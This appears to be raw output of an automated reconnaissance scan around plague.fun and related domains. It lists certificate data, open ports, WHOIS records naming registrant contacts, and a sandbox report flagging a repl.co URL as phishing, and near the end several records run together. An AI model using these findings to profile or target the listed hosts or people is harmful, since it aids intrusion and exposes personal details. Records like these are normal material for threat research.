                    bb:89:fe:9f:c9:f2:e8:ed:d4:13:6a:74:bb:54:79:
                    b8:27:6d:90:01:e0:be:5d:f9:e8:61:3e:d3:8e:13:
                    0b:c0:e3:b9:e9:81:3b:d6:d1:80:50:6a:0e:80:e2:
                    e7:bc:d5:ec:5b
                ASN1 OID: prime256v1
                NIST CURVE: P-256
        X509v3 extensions:
            X509v3 Key Usage: critical
                Digital Signature
            X509v3 Extended Key Usage:
                TLS Web Server Authentication, TLS Web Client Authentication
            X509v3 Basic Constraints: critical
                CA:FALSE
            X509v3 Subject Key Identifier:
                E9:2C:D8:38:4D:A7:AE:7E:D2:DB:0C:69:89:B1:06:B2:70:BB:A0:0E
            X509v3 Authority Key Identifier:
                keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
            Authority Information Access:
                OCSP - URI:http://e1.o.lencr.org
                CA Issuers - URI:http://e1.i.lencr.org/
            X509v3 Subject Alternative Name:
                DNS:*.plague.fun, DNS:plague.fun
            X509v3 Certificate Policies:
                Policy: 2.23.140.1.2.1
                Policy: 1.3.6.1.4.1.44947.1.1.1
                  CPS: http://cps.letsencrypt.org
            CT Precertificate Poison: critical
                NULL
    Signature Algorithm: ecdsa-with-SHA384
         30:65:02:31:00:8a:13:86:00:52:1a:c1:0d:64:4c:3a:d0:7d:
         ad:a3:1f:3d:77:c0:7b:e0:38:7d:8a:d1:13:d1:2c:4d:d8:d3:
         55:c4:42:b5:2c:66:8f:c9:c6:58:d2:35:f0:54:a9:b1:fa:02:
         30:03:c9:aa:f7:e7:41:d6:3c:a5:0a:5a:1b:57:5a:06:d4:2b:
         b1:c3:23:17:ba:be:0f:99:c0:9a:36:c9:f2:ce:f3:30:3e:9e:
         a0:05:0c:ae:61:ce:b0:e0:07:94:04:30:53

Date Found: 2022-12-18 00:09:14 | Type: Open TCP Port | Risky: No | Module: Pulsedive | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None
Data: 188.114.96.2:8080
Source Data: 188.114.96.0/24

Date Found: 2022-12-18 00:10:04 | Type: Linked URL - Internal | Risky: No | Module: URLScan.io | Children: 0 | Correlations: 0 | Distance: 1 | Starred: 0 | Annotation: None
Data: http://misogyny.wtf/inject/UsRjS959Rqm4sPG4
Source Data: misogyny.wtf

Date Found: 2022-12-18 00:21:20 | Type: Open TCP Port | Risky: No | Module: Censys | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: 188.114.97.1:443
Source Data: 188.114.97.1

Date Found: 2022-12-18 00:08:28 | Type: Open TCP Port | Risky: No | Module: Pulsedive | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None
Data: 81.88.52.222:21
Source Data: 81.88.52.222

Date Found: 2022-12-18 00:09:41 | Type: Co-Hosted Site | Risky: No | Module: HackerTarget | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: acnscrt.rcvry.workers.dev
Source Data: 172.67.147.230

Date Found: 2022-12-18 00:26:44 | Type: Physical Location | Risky: No | Module: MetaDefender | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: Kansas City, United States
Source Data: 34.149.204.188

Date Found: 2022-12-18 00:21:34 | Type: Open TCP Port Banner | Risky: No | Module: Censys | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data:
HTTP/1.1 403 Forbidden
Date:
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 77ae417d4f861cda-ORD
Content-Encoding: gzip
Source Data: 104.21.19.243

Date Found: 2022-12-18 00:19:10 | Type: Hosting Provider | Risky: No | Module: Hosting Provider Identifier | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None
Data: register.it: http://we.register.it/
Source Data: 81.88.48.101

Date Found: 2022-12-18 00:21:37 | Type: Netblock Membership | Risky: No | Module: Censys | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: 20.192.0.0/10
Source Data: 20.226.83.185

Date Found: 2022-12-18 00:21:11 | Type: WiFi Access Point Nearby | Risky: No | Module: Wigle.net | Children: 0 | Correlations: 0 | Distance: 5 | Starred: 0 | Annotation: None
Data: 20:35:09 (Net ID: 00:02:2D:05:BE:2A)
Source Data: 37.780462,-122.390564

Date Found: 2022-12-18 00:21:09 | Type: Open TCP Port | Risky: No | Module: Censys | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: 188.114.96.0:8080
Source Data: 188.114.96.0

Date Found: 2022-12-18 00:12:49 | Type: Physical Location | Risky: No | Module: ipapi.co | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: Amsterdam, North Holland, NH, Netherlands, NL
Source Data: 188.114.97.9

Date Found: 2022-12-18 00:20:39 | Type: Physical Location | Risky: No | Module: Censys | Children: 1 | Correlations: 0 | Distance: 1 | Starred: 0 | Annotation: None
Data: Campinas, Sao Paulo, Brazil, South America
Source Data: 20.195.209.219

Date Found: 2022-12-18 00:09:52 | Type: Co-Hosted Site | Risky: No | Module: HackerTarget | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: blogcast.support
Source Data: 172.67.147.230

Date Found: 2022-12-18 00:21:13 | Type: Open TCP Port | Risky: No | Module: Censys | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: 188.114.97.0:443
Source Data: 188.114.97.0

Date Found: 2022-12-18 00:21:20 | Type: Open TCP Port Banner | Risky: No | Module: Censys | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data:
HTTP/1.1 403 Forbidden
Server: cloudflare
Date:
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 77aa4b011c318178-ORD
Source Data: 188.114.97.1

Date Found: 2022-12-18 00:26:58 | Type: Affiliate - Company Name | Risky: No | Module: Company Name Extractor | Children: 0 | Correlations: 0 | Distance: 7 | Starred: 0 | Annotation: None
Data: Registry Services, LLC
Source Data:
Domain Name: dominiando.us
Registry Domain ID: D19621490-US
Registrar WHOIS Server:
Registrar URL: https://key-systems.net
Updated Date: 2022-06-06T00:00:06Z
Creation Date: 2009-04-22T11:21:03Z
Registry Expiry Date: 2023-04-21T23:59:59Z
Registrar: Key-Systems GmbH
Registrar IANA ID: 269
Registrar Abuse Contact Email: abuse@key-systems.net
Registrar Abuse Contact Phone: +49.6894939685
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: C19621489-US
Registrant Name: Francesco Pacaccio
Registrant Organization: Dominiando Srl
Registrant Street: Piazzale Clodio 8
Registrant Street:
Registrant Street:
Registrant City: Roma
Registrant State/Province:
Registrant Postal Code: 00195
Registrant Country: IT
Registrant Phone: +39.068072248
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: domini@dominiando.it
Registrant Application Purpose: P1
Registrant Nexus Category: C31/IT
Registry Admin ID: C19621489-US
Admin Name: Francesco Pacaccio
Admin Organization: Dominiando Srl
Admin Street: Piazzale Clodio 8
Admin Street:
Admin Street:
Admin City: Roma
Admin State/Province:
Admin Postal Code: 00195
Admin Country: IT
Admin Phone: +39.068072248
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: domini@dominiando.it
Admin Application Purpose: P1
Admin Nexus Category: C31/IT
Registry Tech ID: C2262438-US
Tech Name: Domain Management
Tech Organization: Dominiando Srl
Tech Street: Piazzale Clodio 8
Tech Street:
Tech Street:
Tech City: Rome
Tech State/Province: IT
Tech Postal Code: 00195
Tech Country: IT
Tech Phone: +39.0680693248
Tech Phone Ext:
Tech Fax: +39.06233200178
Tech Fax Ext:
Tech Email: domini@dominiando.it
Tech Application Purpose: P1
Tech Nexus Category: C31/IT
Name Server: ns.dominiando.it
Name Server: ns.dominiando.asia
Name Server: ns.dominiando.uk
Name Server: ns.dominiando.us
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
.US WHOIS Complaint Tool - http://www.whoiscomplaints.us
Advanced WHOIS Instructions - http://whois.us/help.html
Registry Services, LLC, the Registry Administrator for .US, has collected this information for the WHOIS database through a .US-Accredited Registrar. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the registry database. Registry Services, LLC makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without our prior written permission. We reserve the right to modify or change these conditions at any time without prior or subsequent notification of any kind.
By executing this query, in any manner whatsoever, you agree to abide by these terms.
NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME.
All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.whois.us.

Date Found: 2022-12-18 00:02:54 | Type: Domain Registrar | Risky: No | Module: Whois | Children: 0 | Correlations: 0 | Distance: 1 | Starred: 0 | Annotation: None
Data: ENOM, INC.
Source Data: zerotwo-best-waifu.online

Date Found: 2022-12-18 00:12:04 | Type: Country | Risky: No | Module: Country Name Extractor | Children: 0 | Correlations: 0 | Distance: 3 | Starred: 0 | Annotation: None
Data: United States
Source Data: registrar-servers.com

Date Found: 2022-12-18 00:03:05 | Type: Domain Name | Risky: No | Module: DNS Resolver | Children: 0 | Correlations: 0 | Distance: 1 | Starred: 0 | Annotation: None
Data: rasputain.fr
Source Data: rasputain.fr

Date Found: 2022-12-18 00:09:27 | Type: Physical Location | Risky: No | Module: LeakIX | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: Kansas City, Missouri, United States
Source Data: 34.149.204.188

Date Found: 2022-12-18 00:04:01 | Type: Country | Risky: No | Module: Country Name Extractor | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: France
Source Data:
Domain Name: ZEROTWO-BEST-WAIFU.ONLINE
Registry Domain ID: D266274377-CNIC
Registrar WHOIS Server: whois.enom.com
Registrar URL: https://www.enom.com/
Updated Date: 2022-01-11T15:03:40.0Z
Creation Date: 2021-12-25T22:42:25.0Z
Registry Expiry Date: 2022-12-25T23:59:59.0Z
Registrar: eNom, Inc.
Registrar IANA ID: 48
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Data Protected
Registrant State/Province: WA
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.AMENWORLD.COM
Name Server: NS2.AMENWORLD.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: domainabuse@tucows.com
Registrar Abuse Contact Phone: +49.2283296859
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2022-12-18T00:02:53.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: zerotwo-best-waifu.online
Registry Domain ID: D266274377-CNIC
Registrar WHOIS Server: WHOIS.ENOM.COM
Registrar URL: WWW.ENOM.COM
Updated Date: 2022-01-11T15:03:40.00Z
Creation Date: 2021-12-25T22:42:00.00Z
Registrar Registration Expiration Date: 2022-12-25T23:59:59.00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Domain Status: ok https://www.icann.org/epp#ok
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street:
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Paris
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: FR
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Email: https://tieredaccess.com/contact/0b66922f-87a6-44e9-a979-1158d3dacd13
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin Street:
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Email: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech Street:
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Email: REDACTED FOR PRIVACY
Name Server: NS1.AMENWORLD.COM
Name Server: NS2.AMENWORLD.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: ABUSE@ENOM.COM
Registrar Abuse Contact Phone: +1.4259744689
URL of the ICANN WHOIS Data Problem Reporting System: HTTP://WDPRS.INTERNIC.NET/
>>> Last update of WHOIS database: 2022-12-18T00:02:53.00Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms.
Version 6.3 4/3/2002

Date Found: 2022-12-18 00:06:37 | Type: Raw Data from RIRs | Risky: No | Module: Hybrid Analysis | Children: 0 | Correlations: 0 | Distance: 2 | Starred: 0 | Annotation: None
Data: [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': None, u'total_processes': 15, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://567893.568093.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"567893.568093.repl.co"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "172.217.14.202:443"\n "142.251.33.99:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7300:120:WilError_01"\n "Local\\SM0:872:120:WilError_01"\n "Local\\SM0:872:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:7300:304:WilStaging_02"\n "Local\\SM0:7300:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7300:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6072:304:WilStaging_02"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\000003.log]- [targetUID: 00000000-00007300]\n "Part-DE" has type "data"- Location: [%TEMP%\\7300_1309003135\\Part-DE]- [targetUID: 00000000-00007300]\n "ffdef2eb-b13e-4c4a-b636-dcf1dc50f84b.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ffdef2eb-b13e-4c4a-b636-dcf1dc50f84b.tmp]- [targetUID: 00000000-00007300]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007300]\n "5f12d478-216d-4154-8599-aaf1569f8315.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\5f12d478-216d-4154-8599-aaf1569f8315.tmp]- [targetUID: 00000000-00007300]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.json]- [targetUID: 00000000-00007300]\n 
"602356ed-a79c-4174-a692-bce7264c1802.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\602356ed-a79c-4174-a692-bce7264c1802.tmp]- [targetUID: 00000000-00007300]\n "b7c84071-5459-4186-900e-239fed17e8fc.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\b7c84071-5459-4186-900e-239fed17e8fc.tmp]- [targetUID: 00000000-00007300]\n "crl-set" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\crl-set]- [targetUID: 00000000-00007300]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.json]- [targetUID: 00000000-00007300]\n "Part-ZH" has type "data"- Location: [%TEMP%\\7300_1309003135\\Part-ZH]- [targetUID: 00000000-00007300]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005924]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007300]\n "6f303046-038f-4d70-8605-69e3084c809f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6f303046-038f-4d70-8605-69e3084c809f.tmp]- [targetUID: 00000000-00007300]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.fingerprint]- [targetUID: 00000000-00007300]\n "e657712d-ab9b-47fe-9b36-58c8c9e72709.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\e657712d-ab9b-47fe-9b36-58c8c9e72709.tmp]- 
[targetUID: 00000000-00004980]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\7300_1309003135\\adblock_snippet.js]- [targetUID: 00000000-00007300]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\LOG]- [targetUID: 00000000-00007300]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7300_288640161\\shopping_iframe_driver.js]- [targetUID: 00000000-00007300]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://567893.568093.repl.co/"\n Pattern match: "https://567893.568093.repl.co"\n Heuristic match: "567893.568093.repl.co"\n Heuristic match: "1t;ps_//\'56_893.__6_C93.repl.co"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\7300_1309003135\\adblock_snippet.js]- [targetUID: 00000000-00007300]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\7300_288640161\\shopping_iframe_driver.js]- [targetUID: 00000000-00007300]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\7300_288640161\\edge_driver.js]- [targetUID: 00000000-00007300]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\7300_288640161\\auto_open_controller.js]- [targetUID: 00000000-00007300]\n Dropped file: "shopping.js" - Location: [%TEMP%\\7300_288640161\\shopping.js]- [targetUID: 
00000000-00007300]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\7300_288640161\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007300]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\7300_288640161\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007300]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\7300_288640161\\shoppingfre.js]- [targetUID: 00000000-00007300]\n Dropped file: "product_page.js" - Location: [%TEMP%\\7300_288640161\\product_page.js]- [targetUID: 00000000-00007300]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\7300_288640161\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007300]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'String', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"2022/10/28-14:23:13.830 1bd4 Reusing MANIFEST C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata/MANIFEST-000001" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000036-10285181\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE4-181934859\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE4-13831731778\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\4d91e8be-1b94-4c4d-88fd-0ce806f4f8ed" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE4-34530222198\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User 
Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE6-34542504978\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.28" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE4-255949648359\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir7300_1766638344" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE4-258127648537\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.28\\LICENSE" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE2-258775174583\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir7300_1766638344\\LICENSE" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE2-258775174583\n "--ty 34.149.204.188 2022-12-18 00:13:51 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None support@ovh.net %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. 
%% domain: plague.fr status: ACTIVE eppstatus: active hold: NO holder-c: ANO00-FRNIC admin-c: ANO00-FRNIC tech-c: OVH5-FRNIC registrar: OVH Expiry Date: 2023-01-30T04:23:37Z created: 2014-01-30T04:23:37Z last-update: 2022-01-30T04:35:23Z source: FRNIC nserver: dns107.ovh.net nserver: ns107.ovh.net source: FRNIC key1-tag: 10120 key1-algo: 8 [RSASHA256] key1-dgst-t: 8 [SHA256] key1-dgst: 5BD52D51E250B4CC173D1D59D9A7F23891B3311873364A4F9B2B612EF4CDDD58 source: FRNIC registrar: OVH address: 2 Rue Kellermann address: 59100 ROUBAIX country: FR phone: +33.899701761 fax-no: +33.320200958 e-mail: support@ovh.net website: http://www.ovh.com anonymous: No registered: 1999-10-18T00:00:00Z source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: OVH changed: 2019-01-04T14:49:13Z anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: OVH anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. 
remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: OVH5-FRNIC type: ORGANIZATION contact: OVH NET address: OVH address: 140, quai du Sartel address: 59100 Roubaix country: FR phone: +33.899701761 e-mail: tech@ovh.net registrar: OVH changed: 2022-12-17T20:33:44.519173Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:10.534955Z <<< 2022-12-18 00:07:55 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.info plague.fun 2022-12-18 00:07:17 Web Content Type No Web Spider 0 0 2 0 None text/html; charset=utf-8 http://misogyny.wtf/inject/UsRjS959Rqm4sPG4 2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.28.240 2022-12-18 00:09:43 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.3:80 188.114.97.3 2022-12-18 00:03:25 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 185.204.149.34.bc.googleusercontent.com 34.149.204.185 2022-12-18 00:02:48 IPv6 Address No Mnemonic PassiveDNS 13 0 1 0 None 2606:4700:3033::6815:1cf0 